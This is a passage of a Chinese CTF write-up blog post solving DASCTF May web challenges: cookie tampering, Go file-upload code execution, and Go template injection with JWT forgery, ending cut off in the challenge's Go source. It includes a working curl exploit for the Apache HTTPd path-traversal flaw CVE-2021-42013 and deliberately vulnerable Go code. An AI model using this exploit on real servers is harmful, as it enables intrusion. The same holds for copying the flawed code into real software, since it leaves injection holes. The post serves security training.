<!DOCTYPE html>
<html lang="zh-CN">
    <head prefix="og: https://ogp.me/ns#">
  <meta charset="utf-8">
  <meta name="referrer" content="no-referrer" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="color-scheme" content="light dark">
  
  <title>DASCTF MAY出题人挑战赛 - Boogiepop Doesn&#39;t Laugh</title>
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    <link rel='manifest' href='/manifest.json'>
  

  
  
  
  <meta property="og:title" content="DASCTF MAY出题人挑战赛 - Boogiepop Doesn&#39;t Laugh" />
  
  <meta property="og:type" content="article" />
  
  <meta property="og:url" content="http://example.com/2023/03/02/DASCTF%20MAY%20%E5%87%BA%E9%A2%98%E4%BA%BA%E6%8C%91%E6%88%98%E8%B5%9B/index.html" />
  
  <meta property="og:image" content="/favicon.png" />
  
  <meta property="og:article:published_time" content="2023-03-02T10:38:18.000Z" />
  
  <meta property="og:article:author" content="Boogipop" />
  
  

  
<link rel="stylesheet" href="/css/var.css">

  
<link rel="stylesheet" href="/css/main.css">

  
<link rel="stylesheet" href="/css/typography.css">

  
<link rel="stylesheet" href="/css/code-highlighting.css">

  
<link rel="stylesheet" href="/css/components.css">

  
<link rel="stylesheet" href="/css/nav.css">

  
<link rel="stylesheet" href="/css/paginator.css">

  
<link rel="stylesheet" href="/css/footer.css">

  
<link rel="stylesheet" href="/css/post-list.css">

  
<link rel="stylesheet" href="/css/giscus.css">

  
  
<link rel="stylesheet" href="/css/rainbow-banner.css">

  
  
  
<link rel="stylesheet" href="/css/toc.css">

  
  
    
<link rel="stylesheet" href="/css/giscus.css">

  
  
  
  
<link rel="stylesheet" href="/css/post.css">

  
  
  
  
  

  
<meta name="generator" content="Hexo 6.3.0"></head>
    <body
        data-color-scheme="auto"
        data-uppercase-categories="true"
        
        data-rainbow-banner="true"
        data-rainbow-banner-shown="auto"
        data-rainbow-banner-month="6"
        data-rainbow-banner-colors="#e50000,#ff8d00,#ffee00,#008121,#004cff,#760188"
        
        data-config-root="/"
        
        data-toc="true"
        data-toc-max-depth="2"
        
        
    >
        <nav id="theme-nav">
    <div class="inner">
        <a class="title" href="/">Blog</a>
        <div class="nav-arrow"></div>
        <div class="nav-items">
            <a class="nav-item nav-item-home" href="/">Home</a>
            
            
            <a class="nav-item" href="/archives">Archives</a>
            
            
            
            <a class="nav-item" href="/friends">Friends</a>
            
            
            
            <a class="nav-item" href="/about">About</a>
            
            
            
            <a class="nav-item" href="/categories">Categories</a>
            
            
            
            <a class="nav-item nav-item-github nav-item-icon" href="https://github.com/MrWillCom" target="_blank" aria-label="GitHub">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-codepen nav-item-icon" href="https://codepen.io/mrwillcom" target="_blank" aria-label="CodePen">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-patreon nav-item-icon" href="https://www.patreon.com/MrWillCom" target="_blank" aria-label="Patreon">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-mastodon nav-item-icon" href="https://noc.social/@MrWillCom" target="_blank" aria-label="Mastodon">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-discord nav-item-icon" href="https://discord.gg/UKuFDjcfY8" target="_blank" aria-label="Discord">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-search nav-item-icon" href="/search" target="_blank" aria-label="Search">&nbsp;</a>
            
            
        </div>
    </div>
</nav>
        
<article class="post">
    <div class="meta">
        
        <div class="categories text-uppercase">
        
            <a href="/categories/WriteUp/">WriteUp</a>
        
        </div>
        

        
        <div class="date" id="date">
            <span>March</span>
            <span>2,</span>
            <span>2023</span>
        </div>
        

        <h2 class="title">DASCTF MAY出题人挑战赛</h2>
    </div>

    <div class="divider"></div>

    <div class="content">
        <h2 id="Power-Cookie"><a href="#Power-Cookie" class="headerlink" title="Power Cookie"></a>Power Cookie</h2><p>考点：简单的签到题<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670510901535-6e8b919e-c23e-4668-a96f-83c75038ecbc.png#averageHue=%23fafaf9&clientId=ua3c3ce1a-24c2-4&from=paste&height=173&id=ufdc81d8a&name=image.png&originHeight=216&originWidth=926&originalType=binary&ratio=1&rotation=0&showTitle=false&size=12606&status=done&style=none&taskId=ue394b5b4-2af1-4bef-a42a-fd118ed1a4d&title=&width=740.8" alt="image.png"><br>在登录解密抓个包就可以发现解题思路了：<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670510926543-63c47162-c439-4f6b-beb3-0eded86c98b3.png#averageHue=%23faf9f9&clientId=ua3c3ce1a-24c2-4&from=paste&height=178&id=u24bb5f51&name=image.png&originHeight=222&originWidth=628&originalType=binary&ratio=1&rotation=0&showTitle=false&size=18144&status=done&style=none&taskId=ud9b5d5dd-5286-4311-870e-38ae509bada&title=&width=502.4" alt="image.png"><br>在check界面加个admin的cookie就可以得到flag<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670510945453-607f7e7e-fa78-4d83-a694-c29eb826f2cb.png#averageHue=%23ecce9a&clientId=ua3c3ce1a-24c2-4&from=paste&height=118&id=ud8bc125b&name=image.png&originHeight=147&originWidth=952&originalType=binary&ratio=1&rotation=0&showTitle=false&size=12663&status=done&style=none&taskId=u8a4309ca-31aa-4c4c-9f3d-aa962d39a1e&title=&width=761.6" alt="image.png"></p>
<h2 id="魔法浏览器"><a href="#魔法浏览器" class="headerlink" title="魔法浏览器"></a>魔法浏览器</h2><p>考点：签到题<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670511113258-7b79e740-a4dd-4ac4-8017-792f67f260a6.png#averageHue=%23bb804d&clientId=ua3c3ce1a-24c2-4&from=paste&height=50&id=u1b8c4b17&name=image.png&originHeight=62&originWidth=1895&originalType=binary&ratio=1&rotation=0&showTitle=false&size=7609&status=done&style=none&taskId=uedb290a4-5a6e-4c23-bd92-e57cdf3c2ed&title=&width=1516" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670511139500-20cf3bfa-9d0c-45bf-b533-6e3330162d28.png#averageHue=%23fdf8f6&clientId=ua3c3ce1a-24c2-4&from=paste&height=112&id=ud7aca80e&name=image.png&originHeight=140&originWidth=1828&originalType=binary&ratio=1&rotation=0&showTitle=false&size=22130&status=done&style=none&taskId=ufba38c0b-e513-4077-bc9a-aa0cdf2b5eb&title=&width=1462.4" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670511103934-a204ab33-8908-411a-a43c-1e62b304446f.png#averageHue=%237f7f7f&clientId=ua3c3ce1a-24c2-4&from=paste&height=719&id=u14d213d9&name=image.png&originHeight=899&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=68120&status=done&style=none&taskId=u84d2fc6e-4641-43a1-a2ff-f229cdae29f&title=&width=1536" alt="image.png"></p>
<h2 id="getme"><a href="#getme" class="headerlink" title="getme"></a>getme</h2><p>CVE-2021-42013 Apache HTTPd 2.4.49&#x2F;2.4.50 路径穿越与命令执行漏洞<br>这个倒是挺好识别的，打开浏览器抓包界面：<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670513909173-35879820-30d0-4333-86f8-eacbf5f71672.png#averageHue=%23e9c289&clientId=uc65b6ee8-7345-4&from=paste&height=134&id=ue46ba9c7&name=image.png&originHeight=168&originWidth=1294&originalType=binary&ratio=1&rotation=0&showTitle=false&size=17126&status=done&style=none&taskId=u73868e7b-7732-4588-824d-14c3503249f&title=&width=1035.2" alt="image.png"></p>
<p>POC：<code>curl -v --data &quot;echo;cat /diajgk/djflgak/qweqr/eigopl/f*&quot; &#39;[http://node4.buuoj.cn:29284/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh&#39;](http://node4.buuoj.cn:29284/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh&#39;)</code></p>
<p><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670513972785-b3a48100-6fa5-4a0d-b024-d62e24fc52eb.png#averageHue=%230b0a09&clientId=uc65b6ee8-7345-4&from=paste&height=358&id=u534bf797&name=image.png&originHeight=448&originWidth=1300&originalType=binary&ratio=1&rotation=0&showTitle=false&size=42774&status=done&style=none&taskId=udbe27e15-8165-4565-8e91-05190b5ba39&title=&width=1040" alt="image.png"></p>
<h2 id="hackme"><a href="#hackme" class="headerlink" title="hackme"></a>hackme</h2><p>考点:GO语言的RCE<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670515019438-c54d0fe0-4d54-4b93-8a32-092dc8912c64.png#averageHue=%23fefefe&clientId=uc65b6ee8-7345-4&from=paste&height=514&id=u68af72b6&name=image.png&originHeight=642&originWidth=1235&originalType=binary&ratio=1&rotation=0&showTitle=false&size=30651&status=done&style=none&taskId=uffa0c350-d443-4a17-b62f-075459833ce&title=&width=988" alt="image.png"><br>进入后本来就只有<code>process,log,whoami,users,uptime,flag</code>这几个选项的，算了我还是重开一个环境吧：<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670515148182-fa3c1679-8c1f-4554-a546-fd1c10101347.png#averageHue=%23fefefe&clientId=uc65b6ee8-7345-4&from=paste&height=389&id=u0409154c&name=image.png&originHeight=486&originWidth=1472&originalType=binary&ratio=1&rotation=0&showTitle=false&size=17870&status=done&style=none&taskId=u562bde7a-1b0b-402d-8276-91534f4a7ea&title=&width=1177.6" alt="image.png"><br>点进去process:<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670515159956-2e078b2e-b84f-4645-8617-c71a83245db4.png#averageHue=%23f7f5f4&clientId=uc65b6ee8-7345-4&from=paste&height=218&id=u3dabb616&name=image.png&originHeight=272&originWidth=1919&originalType=binary&ratio=1&rotation=0&showTitle=false&size=39719&status=done&style=none&taskId=ucb78636c-d3f9-4fda-bc50-e1087edc35e&title=&width=1535.2" alt="image.png"><br>返回了一些敏感信息，可以看到每个文件都是go类型的文件，随便上传一个文件：<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670515193724-e8d63f46-1983-4caf-ae1b-3f73dd27b5de.png#averageHue=%23efdfae&clientId=uc65b6ee8-7345-4&from=paste&height=148&id=u45dc229a&name=image.png&originHeight=185&originWidth=1174&originalType=binary&ratio=1&rotation=0&showTitle=false&size=23238&status=done&style=none&taskId=uc192fa5e-6363-46a0-aa55-42f47b44e84&title=&width=939.2" alt="image.png"><br>会自动加上后缀，尝试过上传go文件，我猜测他会执行这个go文件：<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670515228409-e99261e7-cb19-41b7-88cf-72ef956785f5.png#averageHue=%23f5ebd0&clientId=uc65b6ee8-7345-4&from=paste&height=110&id=u3abe9f9d&name=image.png&originHeight=137&originWidth=1125&originalType=binary&ratio=1&rotation=0&showTitle=false&size=11097&status=done&style=none&taskId=u01613e80-da8a-4bcd-a79e-2d8663016b1&title=&width=900" alt="image.png"><br>但是他似乎会自动给你加一个.go后缀，到这里就给绕的有点恶心了，然后想起来之前访问users目录：<br><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670515295152-51026722-eb02-4cdb-9cb8-69d1b1a5b72b.png#averageHue=%23fcfcee&clientId=uc65b6ee8-7345-4&from=paste&height=94&id=u667e75dc&name=image.png&originHeight=118&originWidth=1242&originalType=binary&ratio=1&rotation=0&showTitle=false&size=10671&status=done&style=none&taskId=ua80bd08e-d1e8-4569-bca4-5c7043cfc9d&title=&width=993.6" alt="image.png"><br>也会回显一个类似的，这边的users.go似乎就没加后缀，所以我们是否只需要上传一个users.go文件，内容就是命令执行的内容即可呢？：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">package main</span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"><span class="string">&quot;fmt&quot;</span></span><br><span class="line"><span class="string">&quot;log&quot;</span></span><br><span class="line"><span class="string">&quot;os/exec&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">func main() &#123;</span><br><span class="line">	cmd := <span class="built_in">exec</span>.Command(<span class="string">&quot;cat&quot;</span>, <span class="string">&quot;/flag&quot;</span>)</span><br><span class="line">	out, err := cmd.CombinedOutput()</span><br><span class="line">	<span class="keyword">if</span> err != nil &#123;</span><br><span class="line">        fmt.Printf(<span class="string">&quot;combined out:\n%s\n&quot;</span>, string(out))</span><br><span class="line">		log.Fatalf(<span class="string">&quot;cmd.Run() failed with %s\n&quot;</span>, err)</span><br><span class="line">	&#125;</span><br><span class="line">	fmt.Printf(<span class="string">&quot;combined out:\n%s\n&quot;</span>, string(out))</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2022/png/32634994/1670515367999-badfed6c-12a1-4b59-8400-cee0b6edaa96.png#averageHue=%23e6bc8a&clientId=uc65b6ee8-7345-4&from=paste&height=210&id=u26ffbcf8&name=image.png&originHeight=262&originWidth=1209&originalType=binary&ratio=1&rotation=0&showTitle=false&size=25824&status=done&style=none&taskId=u605d093b-4b46-444b-b07c-1473cd38bc3&title=&width=967.2" alt="image.png">访问users后得解</p>
<h2 id="fxxkgo"><a href="#fxxkgo" class="headerlink" title="fxxkgo"></a>fxxkgo</h2><p>考点：GO的SSTI，JWT伪造</p>
<p>白盒审计，给了源码,顺便浅学了一下GO和Go.Gin的语法</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;encoding/json&quot;</span></span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">	<span class="string">&quot;github.com/gin-gonic/gin&quot;</span></span><br><span class="line">	<span class="string">&quot;github.com/golang-jwt/jwt&quot;</span></span><br><span class="line">	<span class="string">&quot;os&quot;</span></span><br><span class="line">	<span class="string">&quot;text/template&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">type</span> Account <span class="keyword">struct</span> &#123;</span><br><span class="line">	id         <span class="type">string</span></span><br><span class="line">	pw         <span class="type">string</span></span><br><span class="line">	is_admin   <span class="type">bool</span></span><br><span class="line">	secret_key <span class="type">string</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">type</span> AccountClaims <span class="keyword">struct</span> &#123;</span><br><span class="line">	Id       <span class="type">string</span> <span class="string">`json:&quot;id&quot;`</span></span><br><span class="line">	Is_admin <span class="type">bool</span>   <span class="string">`json:&quot;is_admin&quot;`</span></span><br><span class="line">	jwt.StandardClaims</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">type</span> Resp <span class="keyword">struct</span> &#123;</span><br><span class="line">	Status <span class="type">bool</span>   <span class="string">`json:&quot;status&quot;`</span></span><br><span class="line">	Msg    <span class="type">string</span> <span class="string">`json:&quot;msg&quot;`</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">type</span> TokenResp <span class="keyword">struct</span> &#123;</span><br><span class="line">	Status <span class="type">bool</span>   <span class="string">`json:&quot;status&quot;`</span></span><br><span class="line">	Token  <span class="type">string</span> <span class="string">`json:&quot;token&quot;`</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> acc []Account</span><br><span class="line"><span class="keyword">var</span> secret_key = os.Getenv(<span class="string">&quot;KEY&quot;</span>)</span><br><span class="line"><span class="keyword">var</span> flag = os.Getenv(<span class="string">&quot;FLAG&quot;</span>)</span><br><span class="line"><span class="keyword">var</span> admin_id = os.Getenv(<span class="string">&quot;ADMIN_ID&quot;</span>)</span><br><span class="line"><span class="keyword">var</span> admin_pw = os.Getenv(<span class="string">&quot;ADMIN_PW&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">get_account</span><span class="params">(uid <span class="type">string</span>)</span></span> Account &#123;</span><br><span class="line">	<span class="keyword">for</span> i := <span class="keyword">range</span> acc &#123;</span><br><span class="line">		<span class="keyword">if</span> acc[i].id == uid &#123;</span><br><span class="line">			<span class="keyword">return</span> acc[i]</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> Account&#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">clear_account</span><span class="params">()</span></span> &#123;</span><br><span class="line">	acc = acc[:<span class="number">1</span>]</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">jwt_encode</span><span class="params">(id <span class="type">string</span>, is_admin <span class="type">bool</span>)</span></span> (<span class="type">string</span>, <span class="type">error</span>) &#123;</span><br><span class="line">	claims := AccountClaims&#123;</span><br><span class="line">		id, is_admin, jwt.StandardClaims&#123;&#125;,</span><br><span class="line">	&#125;</span><br><span class="line">	token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)</span><br><span class="line">	<span class="keyword">return</span> token.SignedString([]<span class="type">byte</span>(secret_key))</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">jwt_decode</span><span class="params">(s <span class="type">string</span>)</span></span> (<span class="type">string</span>, <span class="type">bool</span>) &#123;</span><br><span class="line">	token, err := jwt.ParseWithClaims(s, &amp;AccountClaims&#123;&#125;, <span class="function"><span class="keyword">func</span><span class="params">(token *jwt.Token)</span></span> (<span class="keyword">interface</span>&#123;&#125;, <span class="type">error</span>) &#123;</span><br><span class="line">		<span class="keyword">return</span> []<span class="type">byte</span>(secret_key), <span class="literal">nil</span></span><br><span class="line">	&#125;)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		fmt.Println(err)</span><br><span class="line">		<span class="keyword">return</span> <span class="string">&quot;&quot;</span>, <span class="literal">false</span></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> claims, ok := token.Claims.(*AccountClaims); ok &amp;&amp; token.Valid &#123;</span><br><span class="line">		<span class="keyword">return</span> claims.Id, claims.Is_admin</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="string">&quot;&quot;</span>, <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">rootHandler</span><span class="params">(c *gin.Context)</span></span> &#123;</span><br><span class="line">	token := c.GetHeader(<span class="string">&quot;X-Token&quot;</span>)</span><br><span class="line">	<span class="keyword">if</span> token != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">		id, _ := jwt_decode(token)</span><br><span class="line">		acc := get_account(id)</span><br><span class="line">		tpl, err := template.New(<span class="string">&quot;&quot;</span>).Parse(<span class="string">&quot;Logged in as &quot;</span> + acc.id)</span><br><span class="line">		<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		&#125;</span><br><span class="line">		tpl.Execute(c.Writer, &amp;acc)</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">flagHandler</span><span class="params">(c *gin.Context)</span></span> &#123;</span><br><span class="line">	token := c.GetHeader(<span class="string">&quot;X-Token&quot;</span>)</span><br><span class="line">	<span class="keyword">if</span> token != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">		id, is_admin := jwt_decode(token)</span><br><span class="line">		<span class="keyword">if</span> is_admin == <span class="literal">true</span> &#123;</span><br><span class="line">			p := Resp&#123;<span class="literal">true</span>, <span class="string">&quot;Hi &quot;</span> + id + <span class="string">&quot;, flag is &quot;</span> + flag&#125;</span><br><span class="line">			res, err := json.Marshal(p) 	</span><br><span class="line">			<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">			&#125;</span><br><span class="line">			c.JSON(<span class="number">200</span>, <span class="type">string</span>(res))</span><br><span class="line">			<span class="keyword">return</span></span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">			c.JSON(<span class="number">403</span>, gin.H&#123;</span><br><span class="line">				<span class="string">&quot;code&quot;</span>: <span class="number">403</span>,</span><br><span class="line">				<span class="string">&quot;status&quot;</span>: <span class="string">&quot;error&quot;</span>,</span><br><span class="line">			&#125;)</span><br><span class="line">			<span class="keyword">return</span></span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">authHandler</span><span class="params">(c *gin.Context)</span></span> &#123;</span><br><span class="line">	uid := c.PostForm(<span class="string">&quot;id&quot;</span>)</span><br><span class="line">	upw := c.PostForm(<span class="string">&quot;pw&quot;</span>)</span><br><span class="line">	<span class="keyword">if</span> uid == <span class="string">&quot;&quot;</span> || upw == <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> <span class="built_in">len</span>(acc) &gt; <span class="number">1024</span> &#123;</span><br><span class="line">		clear_account()</span><br><span class="line">	&#125;</span><br><span class="line">	user_acc := get_account(uid)</span><br><span class="line">	<span class="keyword">if</span> user_acc.id != <span class="string">&quot;&quot;</span> &amp;&amp; user_acc.pw == upw &#123;</span><br><span class="line">		token, err := jwt_encode(user_acc.id, user_acc.is_admin)</span><br><span class="line">		<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">			<span class="keyword">return</span></span><br><span class="line">		&#125;</span><br><span class="line">		p := TokenResp&#123;<span class="literal">true</span>, token&#125;</span><br><span class="line">		res, err := json.Marshal(p)</span><br><span class="line">		<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		&#125;</span><br><span class="line">		c.JSON(<span class="number">200</span>, <span class="type">string</span>(res))</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line">	c.JSON(<span class="number">403</span>, gin.H&#123;</span><br><span class="line">		<span class="string">&quot;code&quot;</span>: <span class="number">403</span>,</span><br><span class="line">		<span class="string">&quot;status&quot;</span>: <span class="string">&quot;error&quot;</span>,</span><br><span class="line">	&#125;)</span><br><span class="line">	<span class="keyword">return</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">Resist</span><span class="params">(c *gin.Context)</span></span>&#123;</span><br><span class="line">	uid := c.PostForm(<span class="string">&quot;id&quot;</span>)</span><br><span class="line">	upw := c.PostForm(<span class="string">&quot;pw&quot;</span>)</span><br><span class="line">	<span class="keyword">if</span> uid == <span class="string">&quot;&quot;</span> || upw == <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> get_account(uid).id != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">		c.JSON(<span class="number">403</span>, gin.H&#123;</span><br><span class="line">			<span class="string">&quot;code&quot;</span>: <span class="number">403</span>,</span><br><span class="line">			<span class="string">&quot;status&quot;</span>: <span class="string">&quot;error&quot;</span>,</span><br><span class="line">		&#125;)</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> <span class="built_in">len</span>(acc) &gt; <span class="number">4</span> &#123;</span><br><span class="line">		clear_account()</span><br><span class="line">	&#125;</span><br><span class="line">	new_acc := Account&#123;uid, upw, <span class="literal">false</span>, secret_key&#125;</span><br><span class="line">	acc = <span class="built_in">append</span>(acc, new_acc)</span><br><span class="line"></span><br><span class="line">	p := Resp&#123;<span class="literal">true</span>, <span class="string">&quot;&quot;</span>&#125;</span><br><span class="line">	res, err := json.Marshal(p)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">	&#125;</span><br><span class="line">	c.JSON(<span class="number">200</span>, <span class="type">string</span>(res))</span><br><span class="line">	<span class="keyword">return</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">index</span><span class="params">(c *gin.Context)</span></span> &#123;</span><br><span class="line">	c.JSON(<span class="number">200</span>,gin.H&#123;</span><br><span class="line">		<span class="string">&quot;msg&quot;</span>: <span class="string">&quot;Hello World&quot;</span>,</span><br><span class="line">	&#125;)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span>  &#123;</span><br><span class="line">	admin := Account&#123;admin_id, admin_pw, <span class="literal">true</span>, secret_key&#125;</span><br><span class="line">	acc = <span class="built_in">append</span>(acc, admin)</span><br><span class="line">	r := gin.Default()</span><br><span class="line">	r.GET(<span class="string">&quot;/&quot;</span>,index)</span><br><span class="line">	r.POST(<span class="string">&quot;/&quot;</span>, rootHandler)</span><br><span class="line">	r.POST(<span class="string">&quot;/flag&quot;</span>, flagHandler)</span><br><span class="line">	r.POST(<span 